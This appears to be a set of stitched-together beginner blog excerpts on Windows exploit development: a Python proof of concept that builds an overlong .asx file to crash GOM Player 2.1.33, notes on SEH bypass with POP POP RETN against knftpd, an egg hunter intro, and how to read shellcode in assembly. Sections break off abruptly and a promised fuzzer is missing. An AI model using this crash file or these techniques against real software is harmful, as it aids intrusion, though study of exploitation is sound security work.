Landing in an unicode application


After several time reading an article about unicode in corelan.be, now let me try how to do that with my own knowledge. Here i'm using the application GOM Player 2.1.33.5071, as we knew if it already exploited several months ago and we will find the exploit of it here, so i'm using the proof of concept how to crashing the application to explain how to build an exploit in it (unicode application).

Here is the POC :
#!/usr/bin/python
header = '<asx version = "3.0" ><entry><title>Download</title><ref href = "WWW.'
junk = "\x41" * 2046
footer = '"/></entry></asx>'

payload = junk

f = open('fuzzer.asx','w')
f.write(header+payload+footer)
f.close()

Just follow the applications flow

knftpd v1.0.0
In a concept if we are finding the application which have SEH protection in our process of an exploit development we must bypass the SEH protection first using POP,POP,RETN instruction and then we have control the EIP register at Next SEH position, but sometimes we must follow the applications flow.
Now we will try to do how to build an exploit with following the applications flow. We will use knftpd-v1.0.0 application. Hem, it's a sounds good to be practice materials in this case. I know if it already exploited in last year and the exploit can be found here, but here i'm trying to explain how to build an exploit at that application.
The application have overflow if we sending an overly long request to Multiple FTP command, so we can create fuzzer like below to have crash in that application :

Build an exploit in low space of your stack (Egg Hunter)


Sometimes if we're fuzzing an application, the application crashed and our fuzzer overwrited some register of it (the values of its register was replaced with our fuzzer) even the most dangerous is our fuzzer have overwrite the values in Instruction Pointer register (IP in 16bit or EIP in 32bit) so we have full control of it resgister which causes we can change flow of that application as we want.
Why be like that? It because EIP register was using to store a memory address (which called as offset) of command to be executed at next. What will happen if we send payload to the stack of that application and then we inserting a memory address of instruction to jump into the stack on EIP register?
Our payload will execute and it's owned. ^_^
To avoid it the developer usually using an "exception" which called as Structure Exception Handling (SEH) to protect the application.

How to read an opcode?

As a beginner, i'm usually confused about the generated shellcode by someone, sometimes i'm thinking what the mean of it, what is it a malicious or not. But after i've know the way how to read a shellcode, now i'm always try to read it before i'm using it.
For example i find a shellcode from here, they said that it's shellcode which will execute a /bin/sh, but i will check it by my self, i'm trying to read it in assembly language. We can learn the basic of assembly language from here.

hello.asm



In naturally computer just know 0 and 1 (binnary), it will processing an instruction which created only from 0 and 1, and this stat usually call as a machine language. Assembly is a low level language and almost like as a machine language.

In machine language, if we want to save a value of an EAX register to the stack we must creating an instruction "01010000", but in Assembly we just create an instruction "PUSH EAX", that's just some differences about an assembly and machine language.

Why must we learn about an assembly language?
Because it is the most important if we want to Reverse Engineering an aplication and it was use full if we want to create our own shellcode in exploit development.

There are two ways to create a syntax in assembly, that are AT&T and NASM. AT&T syntax usually used in GNU like a GNU Assembler, and become as a default syntax in GNU Debugger (GDB), and the NASM syntax usually used a lot in windows area.
Some differeces way of create the syntax are :